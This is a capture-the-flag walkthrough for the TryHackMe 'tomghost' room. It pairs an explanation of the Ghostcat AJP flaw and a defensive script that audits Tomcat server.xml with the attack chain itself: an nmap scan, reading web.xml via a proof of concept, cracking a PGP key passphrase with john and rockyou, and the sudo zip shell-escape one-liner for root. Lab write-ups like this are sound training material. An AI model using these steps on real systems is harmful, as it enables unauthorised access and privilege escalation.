Exploiting GhostCat (CVE-2020-1938)


This walkthrough corresponds to the tomghost machine on TryHackMe: https://tryhackme.com/room/tomghost


The vulnerability is described as follows:

Ghostcat is described as “AJP Request Injection and potential Remote Code Execution”.


Nmap scan: nmap -sC -sV tomghost.thm

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From the scan we can see that:
  • port 8009 is Apache JServ (AJP/1.3)
  • port 8080 is Apache Tomcat/9.0.30

What is AJP?

AJP (Apache JServ Protocol) is a binary protocol that a front-end web server uses to talk, over TCP connections, to the Tomcat servlet container sitting behind it. It is mainly used in cluster or reverse-proxy setups where web servers forward requests to application servers or servlet containers.

Why does the vulnerability exist?

By default, Tomcat treats AJP connections as more trusted than HTTP connections. When AJP is deployed correctly, the protocol requires a shared secret that every client speaking AJP must present. In the default Tomcat configuration this secret is not enabled, so no security check is applied to requests arriving on port 8009. As a result an unauthenticated attacker who can reach the port can read, and potentially write, files on the server.
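To make that trust model concrete, here is an added example (not code from the original writeup, from TryHackMe or from the Tomcat project): a small audit of a Tomcat server.xml that flags AJP connectors configured the way Ghostcat needs them, i.e. reachable from any interface and without a shared secret. The two server.xml fragments are constructed samples, one with the classic pre-fix connector and one hardened with the `address`, `secretRequired` and `secret` attributes of the AJP connector.

```python
# Added example for this writeup, not code from the original post, TryHackMe
# or the Tomcat project. Audits Tomcat server.xml for AJP connectors that lack
# the Ghostcat mitigations (loopback binding and a shared secret).
# Both server.xml fragments below are constructed samples.
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample: the classic pre-fix AJP connector. No address restriction
# and no secret, so anything that can reach port 8009 is trusted.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: the same connector hardened as the Ghostcat fix intends,
# bound to loopback and requiring a shared secret from the reverse proxy.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
               address="127.0.0.1"
               secretRequired="true"
               secret="REPLACE-WITH-A-LONG-RANDOM-SECRET" />
  </Service>
</Server>
"""

# Bind addresses that expose the listener on every interface.
WILDCARD_ADDRESSES = {"0.0.0.0", "::", "::0", "0:0:0:0:0:0:0:0"}


def is_ajp_connector(connector: ET.Element) -> bool:
    """True for protocol="AJP/1.3" and for the explicit AJP implementation class
    names (org.apache.coyote.ajp.AjpNioProtocol etc.). No protocol means HTTP."""
    protocol = connector.get("protocol", "HTTP/1.1")
    return "ajp" in protocol.lower()


def audit_ajp_connectors(server_xml: str) -> List[Dict[str, object]]:
    """Return one finding per AJP connector: its port and a list of issues.
    An empty issues list means the connector passes this check."""
    root = ET.fromstring(server_xml)
    findings = []
    for connector in root.iter("Connector"):
        if not is_ajp_connector(connector):
            continue
        issues = []

        # Reachability: Tomcat trusts AJP peers, so the listener must not face the network.
        address = connector.get("address")
        if address is None:
            issues.append("no address attribute: listens on all interfaces")
        elif address in WILDCARD_ADDRESSES:
            issues.append(f"address={address}: listens on all interfaces")

        # Authentication of the proxy: the secret is the only check on who may speak AJP.
        if connector.get("secretRequired", "").lower() == "false":
            issues.append("secretRequired=false: connector accepts requests without a secret")
        if not connector.get("secret"):
            issues.append("no secret attribute: any AJP client is trusted")

        findings.append({"port": connector.get("port", "?"), "issues": issues})
    return findings


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(xml):
            status = "OK" if not finding["issues"] else "; ".join(finding["issues"])
            print(f"{label}: AJP connector on port {finding['port']}: {status}")
```

The check deliberately treats a missing `secret` as a finding even when `secretRequired` is not set: newer Tomcat releases default `secretRequired` to true and refuse to start the connector without a secret, but the file alone does not tell you which Tomcat version will load it, and the 9.0.30 instance in this room predates that default. Running the script against the weak sample reports both the open bind address and the missing secret; the hardened sample reports no issues.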


Using this PoC:

let's read the file /WEB-INF/web.xml.

Now we have the skyfuck user and its credentials.

SSH in as skyfuck:


We got user.txt but still can't see anything else.
There is an interesting file in skyfuck's home directory; let's decrypt that PGP file.

# copy the PGP key and the encrypted file to the attacking machine
scp skyfuck@tomghost.thm:/home/skyfuck/* .
# convert the PGP private key into a hash john can crack
gpg2john tryhackme.asc > tomghost.hash
# crack the key's passphrase
john --wordlist=/usr/share/wordlists/rockyou.txt tomghost.hash

After doing that we have merlin's password.

Log in as merlin:

As we can see, merlin can run zip as root without a password, so let's check GTFOBins.

According to GTFOBins:

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF


So here we go:

We got root.txt.

